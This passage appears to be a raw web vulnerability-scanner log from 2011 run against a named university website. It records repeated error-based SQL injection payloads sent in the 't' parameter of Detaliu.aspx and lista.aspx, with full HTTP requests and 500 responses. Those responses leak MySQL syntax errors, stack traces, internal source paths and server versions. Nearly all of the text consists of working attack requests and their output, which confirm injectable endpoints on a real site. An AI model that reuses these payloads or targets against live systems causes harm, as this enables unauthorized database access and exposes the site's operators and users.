at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.lista_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /Detaliu.aspx

/Detaliu.aspx

http://umfcluj.ro/Detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
eID GET 62
c GET 0
m GET 0
y GET 0

Request

GET /Detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&eID=62&c=0&m=0&y=0 HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:20:10 GMT
Content-Length: 6411


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4]
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:131
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:88
Netlogiq.Web.Detaliu.PopulatePage() +96
Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 131
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 88
at Netlogiq.Web.Detaliu.PopulatePage()
at Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.detaliu_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /detaliu.aspx

/detaliu.aspx

http://umfcluj.ro/detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
eID GET 451

Request

GET /detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&eID=451 HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:23:32 GMT
Content-Length: 6411


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4]
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:131
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:88
Netlogiq.Web.Detaliu.PopulatePage() +96
Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 131
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 88
at Netlogiq.Web.Detaliu.PopulatePage()
at Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.detaliu_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /lista.aspx

/lista.aspx

http://umfcluj.ro/lista.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALi3Yf6AgLhw6AyAuzu3YUFAv/frr4K
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__VIEWSTATE POST /wEPDwULLTIwMjEzOTE2MTVkZA==
ctl00$hAction POST 3
ctl00$txName POST Smith
ctl00$txNewsletter POST 3

Request

POST /lista.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/lista.aspx?t=Admitere-Prezentare
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 235
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALi3Yf6AgLhw6AyAuzu3YUFAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwULLTIwMjEzOTE2MTVkZA%3d%3d&ctl00$hAction=3&ctl00$txName=Smith&ctl00$txNewsletter=3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:16:41 GMT
Content-Length: 6981


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6]
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:127
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32&amp; Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:237
List.PopulateControl() +297
List.Page_Load(Object sender, EventArgs e) +121
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 127
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32& Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 237
at List.PopulateControl()
at List.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.lista_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /lista.aspx

/lista.aspx

http://umfcluj.ro/lista.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
y GET 2011
m GET 2

Request

GET /lista.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&y=2011&m=2 HTTP/1.1
Referer: http://umfcluj.ro/detaliu.aspx?t=Noutati&eID=289
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:21:08 GMT
Content-Length: 6981


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6]
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:127
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32&amp; Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:237
List.PopulateControl() +297
List.Page_Load(Object sender, EventArgs e) +121
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 127
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32& Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 237
at List.PopulateControl()
at List.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
